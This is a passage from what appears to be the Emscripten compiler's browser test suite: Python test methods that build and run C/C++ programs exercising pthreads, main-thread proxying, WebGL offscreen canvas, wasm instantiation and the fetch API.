self.btest_exit(path_from_root('tests', 'pthread', 'test_pthread_dispatch_after_exit.c'), 0, args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected=0, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([path_from_root('tests', 'in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest_exit('binaryen_async.c', expected=expect, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', expected=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([path_from_root('tests/manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5368), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', expected='0', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
